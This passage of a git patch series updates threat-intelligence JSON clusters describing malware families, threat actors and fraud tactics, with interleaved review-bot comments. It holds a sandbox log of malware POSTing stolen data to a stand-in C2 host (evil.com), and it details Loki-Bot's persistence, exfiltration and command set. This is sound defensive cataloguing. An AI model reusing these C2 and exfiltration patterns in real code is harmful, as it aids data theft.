[42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The 
sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: 
hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", 
@@ -9801,7 +9801,7 @@
 "value": "InvisiMole"
 },
 {
- "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.",
+ "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo",
@@ -10947,7 +10947,7 @@
 "value": "LockPOS"
 },
 {
- "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.",
+ "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda",
@@ -11002,7 +11002,7 @@ "value": "LoJax" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. 
If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. 
For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. 
Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws",
@@ -15962,7 +15962,7 @@
 "synonyms": [],
 "type": []
 },
- "uuid": "",
+ "uuid": "1628467f-cad5-453c-a5da-a4f543747d58",
 "value": "win.spynet_rat"
 },
 {
@@ -17152,7 +17152,7 @@
 "synonyms": [],
 "type": []
 },
- "uuid": "",
+ "uuid": "29e32ea9-8e10-4c50-a4dc-1642066a3df2",
 "value": "win.unidentified_005"
 },
 {
@@ -18429,7 +18429,7 @@
 "value": "X-Tunnel (.NET)"
 },
 {
- "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.",
+ "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo",
From b77087d59ee6698a82ed84007c1a3add0430b0e3 Mon Sep 17 00:00:00 2001
From: Alexandre Dulaunoy
Date: Thu, 2 May 2019 14:48:17 +0200
Subject: [PATCH 29/50] chg: [malpedia] duplicates fixed
---
 clusters/malpedia.json | 1 -
 1 file changed, 1 deletion(-)
diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index c2c2e22..b1d9f45 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -10381,7 +10381,6 @@
 "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer",
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"
 ],
 "synonyms": [
From 7e329855b2e8815070269d72d9789ca4c71728fe Mon Sep 17 00:00:00 2001
From: StefanKelm
Date: Thu, 2 May 2019 15:34:19 +0200
Subject: [PATCH 30/50] Update threat-actor.json Silent Librarian / COBALT DICKENS
---
 clusters/threat-actor.json | 18 +++++++++++++++++-
 1 file changed, 17 insertions(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 7e79a6e..b7227e9 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -6694,7 +6694,23 @@
 },
 "uuid": "ce7bba52-5ae8-44ea-9979-68502d832ab7",
 "value": "Sea Turtle"
+ },
+ {
+ "description": "Last Friday, Deputy Attorney General Rod Rosenstein announced the indictment of nine Iranians who worked for an organization named the Mabna Institute. According to prosecutors, the defendants stole more than 31 terabytes of data from universities, companies, and government agencies around the world. The cost to the universities alone reportedly amounted to approximately $3.4 billion. The information stolen from these universities was used by the Islamic Revolutionary Guard Corps (IRGC) or sold for profit inside Iran. PhishLabs has been tracking this same threat group since late-2017, designating them Silent Librarian. Since discovery, we have been working with the FBI, ISAC partners, and other international law enforcement agencies to help understand and mitigate these attacks.",
+ "meta": {
+ "refs": [
+ "https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment",
+ "https://info.phishlabs.com/blog/silent-librarian-university-attacks-continue-unabated-in-days-following-indictment",
+ "https://www.justice.gov/usao-sdny/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic",
+ "https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities"
+ ],
+ "synonyms": [
+ "COBALT DICKENS"
+ ]
+ },
+ "uuid": "5059b44d-2753-4977-b987-4922f09afe6b",
+ "value": "Silent Librarian"
 }
 ],
- "version": 108
+ "version": 109
 }
From ad00477c875584a7a6652159cd681b6e87c5c4cd Mon Sep 17 00:00:00 2001
From: Deborah Servili
Date: Fri, 3 May 2019 15:55:19 +0200
Subject: [PATCH 31/50] add Scarnos
---
 clusters/tool.json | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)
diff --git a/clusters/tool.json b/clusters/tool.json
index 9fb9806..b15a64f 100644
--- a/clusters/tool.json
+++ b/clusters/tool.json
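Review bot: The new Silent Librarian description opens with "Last Friday, Deputy Attorney General Rod Rosenstein announced the indictment", a date reference that is relative to the PhishLabs post it was copied from and carries no meaning in a reference data set; reword the opening to the absolute date of the announcement as given in the justice.gov press release already listed in refs, e.g. `"description": "In [DATE from the DOJ release], the US Department of Justice announced the indictment of nine Iranians who worked for an organization named the Mabna Institute. ..."`. The indicting organization name is itself a common handle for this group and appears in the text, so `"Mabna Institute"` would plausibly belong in `synonyms` next to `"COBALT DICKENS"`, if the cluster treats organization names as synonyms. The description also attributes the activity to the IRGC; if other entries in this file carry a country field, adding the same attribution here would keep the entry consistent.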
@@ -7670,7 +7670,18 @@
 },
 "uuid": "d8de6b56-9950-4389-83b8-4fc3262dc4c9",
 "value": "JasperLoader"
+ },
+ {
+ "description": "The malware Scranos infects with rootkit capabilities, burying deep into vulnerable Windows computers to gain persistent access — even after the computer restarts. Scranos only emerged in recent months, according to Bitdefender with new research out Tuesday, but the number of its infections has rocketed in the months since it was first identified in November.",
+ "meta": {
+ "refs": [
+ "https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/",
+ "https://techcrunch.com/2019/04/16/scranos-rootkit-passwords-payments/?guccounter=1&guce_referrer_us=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_cs=MrGSn18TmNoWovpLbekFYA"
+ ]
+ },
+ "uuid": "5f0f6af2-b644-49a6-8f68-5d4ca58c989e",
+ "value": "Scranos"
 }
 ],
- "version": 119
+ "version": 120
 }
From 988586fde0ee119cb0629e5155ceb9437a48f65b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Rapha=C3=ABl=20Vinot?=
Date: Mon, 6 May 2019 17:17:16 +0200
Subject: [PATCH 32/50] fix: Duplicate values, typos.
---
 clusters/attck4fraud.json | 25 +++----------------
 ...mitre-enterprise-attack-intrusion-set.json | 2 +-
 clusters/mitre-intrusion-set.json | 2 +-
 .../mitre-mobile-attack-intrusion-set.json | 2 +-
 clusters/mitre-pre-attack-intrusion-set.json | 2 +-
 clusters/sector.json | 4 ---
 clusters/threat-actor.json | 2 +-
 ...mitre-enterprise-attack-intrusion-set.json | 2 +-
 8 files changed, 9 insertions(+), 32 deletions(-)
diff --git a/clusters/attck4fraud.json b/clusters/attck4fraud.json
index 1b9a4b0..47098d7 100644
--- a/clusters/attck4fraud.json
+++ b/clusters/attck4fraud.json
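Review bot: The second ref added for Scranos carries a consent-redirect tracking query string (`?guccounter=1&guce_referrer_us=...&guce_referrer_cs=...`) rather than the article URL; the `guce_referrer_us` value is just a base64-encoded referrer and the whole suffix should be dropped so the ref stays stable and does not leak the submitter's browsing path into a shared data set, i.e. `"https://techcrunch.com/2019/04/16/scranos-rootkit-passwords-payments/"`. The description is quoted press copy with relative dates ("new research out Tuesday", "first identified in November" with no year); anchoring those to the dates in the Bitdefender write-up would make the entry self-contained. The commit subject spells the family "Scarnos" while the entry correctly says "Scranos".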
@@ -168,16 +168,6 @@
 "uuid": "6bec22cb-9aed-426a-bffc-b0a78db6527a",
 "value": "ATM Black Box Attack"
 },
- {
- "description": "Account-Checking Services",
- "meta": {
- "kill_chain": [
- "fraud-tactics:Target Compromise"
- ]
- },
- "uuid": "824bccd3-9dea-4579-8642-8dd15afcfacc",
- "value": "Account-Checking Services"
- },
 {
 "description": "Insider Trading",
 "meta": {
@@ -272,7 +262,8 @@
 "description": "Fund Transfer",
 "meta": {
 "kill_chain": [
- "fraud-tactics:Assets Transfer"
+ "fraud-tactics:Assets Transfer",
+ "fraud-tactics:Monetisation"
 ]
 },
 "uuid": "72ffa97e-d128-4c41-b323-0297b43d8a1b",
@@ -308,16 +299,6 @@
 "uuid": "f1243265-d50a-42fb-a83c-4696f95636e9",
 "value": "Money Mules"
 },
- {
- "description": "Fund Transfer",
- "meta": {
- "kill_chain": [
- "fraud-tactics:Monetisation"
- ]
- },
- "uuid": "a8913af2-8f22-44b2-b6bc-32b7489d8f96",
- "value": "Fund Transfer"
- },
 {
 "description": "Prepaid Cards",
 "meta": {
@@ -349,5 +330,5 @@
 "value": "ATM Explosive Attack"
 }
 ],
- "version": 1
+ "version": 2
 }
diff --git a/clusters/mitre-enterprise-attack-intrusion-set.json b/clusters/mitre-enterprise-attack-intrusion-set.json
index 5c206c3..ad15c6c 100644
--- a/clusters/mitre-enterprise-attack-intrusion-set.json
+++ b/clusters/mitre-enterprise-attack-intrusion-set.json
@@ -4,7 +4,7 @@
 ],
 "category": "actor",
 "description": "Name of ATT&CK Group",
- "name": "Enterprise Attack -intrusion Set",
+ "name": "Enterprise Attack - Intrusion Set",
 "source": "https://github.com/mitre/cti",
 "type": "mitre-enterprise-attack-intrusion-set",
 "uuid": "01f18402-1708-11e8-ac1c-1ffb3c4a7775",
diff --git a/clusters/mitre-intrusion-set.json b/clusters/mitre-intrusion-set.json
index c68b99f..0520025 100644
--- a/clusters/mitre-intrusion-set.json
+++ b/clusters/mitre-intrusion-set.json
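Review bot: The first attck4fraud hunk deletes the "Account-Checking Services" entry outright, and no surviving entry with that value is visible in the hunk; the commit title says these are duplicates, so confirm a second "Account-Checking Services" element exists elsewhere in the file, otherwise the tactic is lost rather than deduplicated. The "Fund Transfer" merge in the next two hunks is cleaner, since the surviving `72ffa97e-...` entry takes over the `fraud-tactics:Monetisation` kill_chain from the deleted `a8913af2-...` one. In both cases a cluster uuid disappears with no forwarding record; cluster uuids are the stable key that external references and relationships hang on, so if any consumer keys on `824bccd3-...` or `a8913af2-...` it now dangles silently. Recording the retired uuids (in the commit message, or on the surviving entry if the cluster format has a place for related/superseded ids) would let consumers remap instead of guessing.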
@@ -4,7 +4,7 @@
 ],
 "category": "actor",
 "description": "Name of ATT&CK Group",
- "name": "intrusion Set",
+ "name": "Intrusion Set",
 "source": "https://github.com/mitre/cti",
 "type": "mitre-intrusion-set",
 "uuid": "10df003c-7831-11e7-bdb9-971cdd1218df",
diff --git a/clusters/mitre-mobile-attack-intrusion-set.json b/clusters/mitre-mobile-attack-intrusion-set.json
index 4f52b18..3a712b2 100644
--- a/clusters/mitre-mobile-attack-intrusion-set.json
+++ b/clusters/mitre-mobile-attack-intrusion-set.json
@@ -4,7 +4,7 @@
 ],
 "category": "actor",
 "description": "Name of ATT&CK Group",
- "name": "Mobile Attack - intrusion Set",
+ "name": "Mobile Attack - Intrusion Set",
 "source": "https://github.com/mitre/cti",
 "type": "mitre-mobile-attack-intrusion-set",
 "uuid": "02ab4018-1708-11e8-8f9d-e735aabdfa53",
diff --git a/clusters/mitre-pre-attack-intrusion-set.json b/clusters/mitre-pre-attack-intrusion-set.json
index ba875c6..7c69222 100644
--- a/clusters/mitre-pre-attack-intrusion-set.json
+++ b/clusters/mitre-pre-attack-intrusion-set.json
@@ -4,7 +4,7 @@
 ],
 "category": "actor",
 "description": "Name of ATT&CK Group",
- "name": "Pre Attack - intrusion Set",
+ "name": "Pre Attack - Intrusion Set",
 "source": "https://github.com/mitre/cti",
 "type": "mitre-pre-attack-intrusion-set",
 "uuid": "1fdc8fa2-1708-11e8-99a3-67b4efc13c4f",
diff --git a/clusters/sector.json b/clusters/sector.json
index 97ffeba..1248a6c 100644
--- a/clusters/sector.json
+++ b/clusters/sector.json
@@ -305,10 +305,6 @@
 "uuid": "a26ae91b-df10-4c6f-b7bc-14c7ba13f21d",
 "value": "Retail"
 },
- {
- "uuid": "6ce2374c-2c81-4298-a941-666bf4258c00",
- "value": "Retail"
- },
 {
 "uuid": "ff403f0f-67d0-494c-aff9-1d748b7e7d8d",
 "value": "Technology"
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index b7227e9..25e623b 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -8,7 +8,7 @@ ], "category": "actor", "description": "Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign.", - "name": "Threat actor", + "name": "Threat Actor", "source": "MISP Project", "type": "threat-actor", "uuid": "7cdff317-a673-4474-84ec-4f1754947823", diff --git a/galaxies/mitre-enterprise-attack-intrusion-set.json b/galaxies/mitre-enterprise-attack-intrusion-set.json index 538fb0e..3bd646a 100644 --- a/galaxies/mitre-enterprise-attack-intrusion-set.json +++ b/galaxies/mitre-enterprise-attack-intrusion-set.json @@ -1,7 +1,7 @@ { "description": "Name of ATT&CK Group", "icon": "user-secret", - "name": "Enterprise Attack -Intrusion Set", + "name": "Enterprise Attack - Intrusion Set", "namespace": "deprecated", "type": "mitre-enterprise-attack-intrusion-set", "uuid": "1f3b8c56-1708-11e8-b211-17a60c0f73ee", From 82ebbc6612929e088a70d1cf12fa701d53ef7bf2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rapha=C3=ABl=20Vinot?= Date: Tue, 7 May 2019 12:09:39 +0200 Subject: [PATCH 33/50] fix: UUID issues --- clusters/android.json | 6 +++--- clusters/malpedia.json | 42 ++++++++++++++++++++-------------------- clusters/ransomware.json | 6 +++--- clusters/sector.json | 4 ++-- clusters/tool.json | 6 +++--- 5 files changed, 32 insertions(+), 32 deletions(-) diff --git a/clusters/android.json b/clusters/android.json index 40ae255..c8b24bb 100644 --- a/clusters/android.json +++ b/clusters/android.json @@ -4497,7 +4497,7 @@ "https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf" ] }, - "uuid": "2c75b006-2d18-11e8-8f57-2714f7737ec5 ", + "uuid": "2c75b006-2d18-11e8-8f57-2714f7737ec5", "value": "BreadSMS" }, { @@ -4569,7 +4569,7 @@ "https://researchcenter.paloaltonetworks.com/2018/04/unit42-henbox-inside-coop/" ] }, - "uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86§", + "uuid": 